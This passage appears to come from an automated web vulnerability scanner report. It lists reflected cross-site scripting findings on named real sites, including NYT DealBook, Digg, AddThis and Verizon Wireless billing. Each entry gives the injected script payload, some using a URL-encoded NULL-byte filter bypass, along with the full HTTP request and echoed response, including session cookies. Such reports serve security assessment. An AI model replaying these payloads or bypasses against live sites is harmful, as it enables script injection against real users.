2.349. http://dealbook.nytimes.com/2010/11/19/in-canada-you-drive-g-m-but-trade-gmm/ [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /2010/11/19/in-canada-you-drive-g-m-but-trade-gmm/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6fb3"><script>alert(1)</script>27487b07546 was submitted in the src parameter. This input was echoed as a6fb3\"><script>alert(1)</script>27487b07546 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/19/in-canada-you-drive-g-m-but-trade-gmm/?src=twra6fb3"><script>alert(1)</script>27487b07546 HTTP/1.1
Host: dealbook.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 04:20:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
an;Stephen+A.+Schwarzman;Steve+Schwarzman;Blackstone+Group;airlinesautos;financials;general-motors;general-motors-of-canada;geo-minerals;legal;michael-b-england;tmx-group;toronto-stock-exchange&src=twra6fb3\"><script>alert(1)</script>27487b07546">
...[SNIP]...

2.350. http://dealbook.nytimes.com/2010/11/19/no-threats-here-financial-firms-tell-u-s/ [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /2010/11/19/no-threats-here-financial-firms-tell-u-s/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b61d"><script>alert(1)</script>383f32f03af was submitted in the src parameter. This input was echoed as 4b61d\"><script>alert(1)</script>383f32f03af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/19/no-threats-here-financial-firms-tell-u-s/?src=twr4b61d"><script>alert(1)</script>383f32f03af HTTP/1.1
Host: dealbook.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 04:20:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54262

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
en+A.+Schwarzman;Steve+Schwarzman;Blackstone+Group;blackrock;financials;financial-stability-oversight-council;hedge-funds;managed-funds-association;too-big-to-fail;top-headline-2;vanguard-group&src=twr4b61d\"><script>alert(1)</script>383f32f03af">
...[SNIP]...

2.351. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %006b43b<a>316e9715753 was submitted in the REST URL parameter 1. This input was echoed as 6b43b<a>316e9715753 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%006b43b<a>316e9715753/2006/06/again/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 20 Nov 2010 04:25:16 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1644
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a>316e9715753/">weblog%006b43b<a>316e9715753</a>
...[SNIP]...

2.352. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005355b"><script>alert(1)</script>24bd0e3daf8 was submitted in the REST URL parameter 1. This input was echoed as 5355b"><script>alert(1)</script>24bd0e3daf8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%005355b"><script>alert(1)</script>24bd0e3daf8/2006/06/again/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 20 Nov 2010 04:25:07 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1790
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a href="/weblog%005355b"><script>alert(1)</script>24bd0e3daf8/2006/">
...[SNIP]...

2.353. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 43119<a>3e35d3f4a4c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /weblog/2006/06/again43119<a>3e35d3f4a4c/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 20 Nov 2010 04:31:12 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Expires: Sat, 20 Nov 2010 04:31:12 GMT
Last-Modified: Sat, 20 Nov 2010 04:31:12 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1352
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>
<head>
<title>dean.edwards.name/weblog/</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwards
...[SNIP]...
</a>/again43119<a>3e35d3f4a4c/</h1>
...[SNIP]...

2.354. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 521de"><script>alert(1)</script>f6fe5705c1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 521de\"><script>alert(1)</script>f6fe5705c1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weblog/2006/06/again/?521de"><script>alert(1)</script>f6fe5705c1e=1 HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 04:22:48 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Link: <http://dean.edwards.name/weblog/?p=75>; rel=shortlink
Expires: Sat, 20 Nov 2010 04:22:48 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 212431

<!doctype html>
<html>
<head>
<title>Dean Edwards: window.onload (again)</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://d
...[SNIP]...
<form class="contact" action="/weblog/2006/06/again/?521de\"><script>alert(1)</script>f6fe5705c1e=1#preview" method="post">
...[SNIP]...

2.355. http://digg.com/login [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /login

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f5eca"><script>alert(1)</script>aaffc14d1b0 was submitted in the REST URL parameter 1. This input was echoed as f5eca"><script>alert(1)</script>aaffc14d1b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /login%00f5eca"><script>alert(1)</script>aaffc14d1b0 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 20:02:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1943021764233658817%3A136; expires=Tue, 21-Dec-2010 20:02:54 GMT; path=/; domain=digg.com
Set-Cookie: d=330fd87d65f776fc4ecc3dae62b8927ecde452c438df97052a8814960d5f0ff7; expires=Sat, 21-Nov-2020 06:10:34 GMT; path=/; domain=.digg.com
X-Digg-Time: D=260173 10.2.128.119
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15328

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg - error_ - Profile</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics,
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/login%00f5eca"><script>alert(1)</script>aaffc14d1b0.rss">
...[SNIP]...

2.356. http://digg.com/remote-submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /remote-submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006ffed"><script>alert(1)</script>270c75346c1 was submitted in the REST URL parameter 1. This input was echoed as 6ffed"><script>alert(1)</script>270c75346c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /remote-submit%006ffed"><script>alert(1)</script>270c75346c1 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 04:20:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1943021764233658817%3A136; expires=Mon, 20-Dec-2010 04:20:34 GMT; path=/; domain=digg.com
Set-Cookie: d=83f155a5be72985626695925dd2c6796d732f5e66a2a29a4d09682adc77aac41; expires=Thu, 19-Nov-2020 14:28:14 GMT; path=/; domain=.digg.com
X-Digg-Time: D=248550 10.2.129.155
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15344

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg - error_ - Profile</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics,
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/remote-submit%006ffed"><script>alert(1)</script>270c75346c1.rss">
...[SNIP]...

2.357. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007acee"><script>alert(1)</script>448ae26c691 was submitted in the REST URL parameter 1. This input was echoed as 7acee"><script>alert(1)</script>448ae26c691 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%007acee"><script>alert(1)</script>448ae26c691 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 04:20:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=2233503940199055809%3A136; expires=Mon, 20-Dec-2010 04:20:27 GMT; path=/; domain=digg.com
Set-Cookie: d=58bbd503a63705bd78757e6916846f902dbdd3f4b67e018d6c24419aab08f9db; expires=Thu, 19-Nov-2020 14:28:07 GMT; path=/; domain=.digg.com
X-Digg-Time: D=230583 10.2.130.111
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15330

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg - error_ - Profile</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics,
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%007acee"><script>alert(1)</script>448ae26c691.rss">
...[SNIP]...

2.358. http://ds.addthis.com/red/psi/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 9bd09<script>alert(1)</script>07fe94bf33b was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/p.json?callback=_ate.ad.hpr9bd09<script>alert(1)</script>07fe94bf33b HTTP/1.1
Host: ds.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dt=X; uid=4cb0ff004a7b228e; psc=4; di=%7B%7D..1290218488.60|1286670077.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 226
Content-Type: text/javascript
Set-Cookie: di=%7B%7D..1290218488.60|1290227251.66; Domain=.addthis.com; Expires=Sun, 18-Nov-2012 14:43:57 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 20 Dec 2010 04:27:31 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 20 Nov 2010 04:27:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 04:27:31 GMT
Connection: close

_ate.ad.hpr9bd09<script>alert(1)</script>07fe94bf33b({"urls":["http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4cb0ff004a7b228e"],"segments" : ["66"],"loc": "NzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg=="})

2.359. http://ds.addthis.com/red/psi/sites/smallbusiness.verizon.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/smallbusiness.verizon.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ef765<script>alert(1)</script>a16b0fbfa5f was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/smallbusiness.verizon.com/p.json?callback=_ate.ad.hpref765<script>alert(1)</script>a16b0fbfa5f&uid=4cb0ff004a7b228e&url=http%3A%2F%2Fsmallbusiness.verizon.com%2Fbundles%2F&evsiqt HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh28.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: di=%7B%7D..1289168056.60|1286670077.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; psc=4; uid=4cb0ff004a7b228e

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 390
Content-Type: text/javascript
Set-Cookie: di=%7B%7D..1290219896.60|1290219896.66; Domain=.addthis.com; Expires=Mon, 19-Nov-2012 02:24:53 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 20 Dec 2010 02:24:56 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 20 Nov 2010 02:24:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:24:56 GMT
Connection: close

_ate.ad.hpref765<script>alert(1)</script>a16b0fbfa5f({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4cb0ff004a7b228e&curl=http%3a%2f%2fsmallbusiness.verizon.com%2fbundles%2f","http://xcdn.xgraph.net/15530/db
...[SNIP]...

2.360. http://ds.addthis.com/red/psi/sites/thompson.blog.avg.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/thompson.blog.avg.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7b4b8<script>alert(1)</script>2a59cb74e2b was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/thompson.blog.avg.com/p.json?callback=_ate.ad.hpr7b4b8<script>alert(1)</script>2a59cb74e2b&uid=4cd70ff39ffa55be&url=http%3A%2F%2Fthompson.blog.avg.com%2F2010%2F11%2Fheads-up-0-day-in-an-exploit-kit.html&ref=http%3A%2F%2Fsecurityblog.verizonbusiness.com%2F&roa6ne HTTP/1.1
Accept: */*
Referer: http://s7.addthis.com/static/r07/sh28.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ds.addthis.com
Proxy-Connection: Keep-Alive
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%222%22%3A%22211109273755449%2CrnoX2kzfEqgAC99y%22%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 328
Content-Type: text/javascript
Set-Cookie: di=%7B%222%22%3A%22211109273755449%2CrnoX2kzfEqgAC99y%22%7D..1290096886.10R|1290347721.60|1289335234.66; Domain=.addthis.com; Expires=Tue, 20-Nov-2012 13:47:38 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 21 Dec 2010 13:55:21 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sun, 21 Nov 2010 13:55:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 21 Nov 2010 13:55:21 GMT
Connection: close

_ate.ad.hpr7b4b8<script>alert(1)</script>2a59cb74e2b({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4cd70ff39ffa55be&curl=http%3a%2f%2fthompson.blog.avg.com%2f2010%2f11%2fheads-up-0-day-in-an-exploit-kit.htm
...[SNIP]...

2.361. https://ebillpay.verizonwireless.com/vzw/accountholder/account/maint-features.do [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ebillpay.verizonwireless.com
Path:   /vzw/accountholder/account/maint-features.do

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e81b3"><script>alert(1)</script>c38e61d6c8d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /vzw/accountholdere81b3"><script>alert(1)</script>c38e61d6c8d/account/maint-features.do HTTP/1.1
Host: ebillpay.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 20 Nov 2010 04:30:56 GMT
Content-type: text/html;charset=ISO-8859-1
Cache-control: private
Pragma: no-cache
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-09
Am_client_type: genericHTML
Content-language: en
Set-cookie: JSESSIONID=7FF670AE71A219D7C622DF17F435219C;Path=/
Set-cookie: acProd=AQIC5wM2LY4Sfcy4Xgutfn%2F%2BBaEDwulfbOZDD80gegSkZ%2Fg%3D%40AAJTSwAKLTM3NTU3NDMwMAACU0kAAjcwAAJTMQACbzE%3D%23;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: acProd=AQIC5wM2LY4Sfcy4Xgutfn%2F%2BBaEDwulfbOZDD80gegSkZ%2Fg%3D%40AAJTSwAKLTM3NTU3NDMwMAACU0kAAjcwAAJTMQACbzE%3D%23;Domain=.vzwcorp.com;Path=/;Secure
Set-cookie: pasta=o1;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: pasta=o1;Domain=.vzwcorp.com;Path=/;Secure
Set-cookie: GLOBALID=xkM5Qw34B8F%252F1L6IhIeXRQAz8WJ6pkgqSYwAEHEdCBz00xrKZklYV7dK%252BP82k6V0;Domain=.verizonwireless.com;Expires=Sun, 20-Nov-2011 04:30:56 GMT;Path=/
Connection: close
Set-Cookie: NSC_mphjo_hwt=ffffffffa17bff6c45525d5f4f58455e445a4a420000;path=/;secure
Content-Length: 14913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" x
...[SNIP]...
<input type="hidden" name="goto" value="https://ebillpay.verizonwireless.com:443/vzw/accountholdere81b3"><script>alert(1)</script>c38e61d6c8d/account/maint-features.do" />
...[SNIP]...

2.362. https://ebillpay.verizonwireless.com/vzw/accountholder/account/maint-features.do [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ebillpay.verizonwireless.com
Path:   /vzw/accountholder/account/maint-features.do

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25251"><script>alert(1)</script>41003dc5788 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /vzw/accountholder/account25251"><script>alert(1)</script>41003dc5788/maint-features.do HTTP/1.1
Host: ebillpay.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 20 Nov 2010 04:31:54 GMT
Content-type: text/html;charset=ISO-8859-1
Cache-control: private
Pragma: no-cache
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-09
Am_client_type: genericHTML
Content-language: en
Set-cookie: JSESSIONID=8E37524D1C2F5990DF234D09B487EF83;Path=/
Set-cookie: acProd=AQIC5wM2LY4Sfcz%2FmRGAONaqDxfT9ECk%2BzcnerjRE55sfUg%3D%40AAJTSwAKLTc3NjQ5NzQ2NgACU0kAAjQwAAJTMQACZ2k%3D%23;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: acProd=AQIC5wM2LY4Sfcz%2FmRGAONaqDxfT9ECk%2BzcnerjRE55sfUg%3D%40AAJTSwAKLTc3NjQ5NzQ2NgACU0kAAjQwAAJTMQACZ2k%3D%23;Domain=.vzwcorp.com;Path=/;Secure
Set-cookie: pasta=gi;Domain=.verizonwireless.com;Path=/;Secure
Set-cookie: pasta=gi;Domain=.vzwcorp.com;Path=/;Secure
Set-cookie: GLOBALID=udfqk5lmQuZdrS5wYPtNZkKuQsu%252BtieZdjYP8ExaHBkoWrOUSMa%252F9o06qUh5P5Y9;Domain=.verizonwireless.com;Expires=Sun, 20-Nov-2011 04:31:54 GMT;Path=/
Connection: close
Set-Cookie: NSC_mphjo_hwt=ffffffffa17b3d6c45525d5f4f58455e445a4a420000;path=/;secure
Content-Length: 14913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" x
...[SNIP]...
<input type="hidden" name="goto" value="https://ebillpay.verizonwireless.com:443/vzw/accountholder/account25251"><script>alert(1)</script>41003dc5788/maint-features.do" />
...[SNIP]...

2.363. https://ebillpay.verizonwireless.com/vzw/accountholder/account/maint-features.do [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ebillpay.verizonwireless.com
Path:   /vzw/accountholder/account/maint-features.do

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8db67"><script>alert(1)</script>6ce20bd7cf4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /vzw/accountholder/account/maint-features.do8db67"><script>alert(1)</script>6ce20bd7cf4 HTTP/1.1
Host: ebillpay.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
